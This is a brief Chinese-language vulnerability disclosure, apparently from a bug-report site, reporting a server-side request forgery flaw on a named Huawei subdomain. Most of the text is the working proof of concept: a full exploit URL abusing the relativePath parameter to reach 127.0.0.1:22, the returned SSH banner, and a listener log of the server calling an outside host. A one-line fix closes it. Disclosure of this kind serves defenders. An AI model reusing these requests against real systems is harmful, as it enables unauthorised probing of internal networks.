华为某分站存在SSRF漏洞

华为某分站存在SSRF漏洞

看看有多少公司认为SSRF不算漏洞

#1 网站

http://hnc.huawei.com/

#2 SSRF地址

http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt

#3 参数

relativePath

http://hnc.huawei.com/web/downloadAction!download.do?relativePath=http://127.0.0.1:22&fileName=123.txt

SSH-2.0-WeOnlyDo 2.4.3

# 请求远程服务器

Connection from 117.78.9.4 port 8080 [tcp/webcache] accepted

GET / HTTP/1.1

Cache-Control: no-cache

Pragma: no-cache

User-Agent: Java/1.6.0_43

Host: 119.29.29.29:8080

Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

Connection: keep-alive

解决方案：

把用于取外网资源的API部署在不属于自己的机房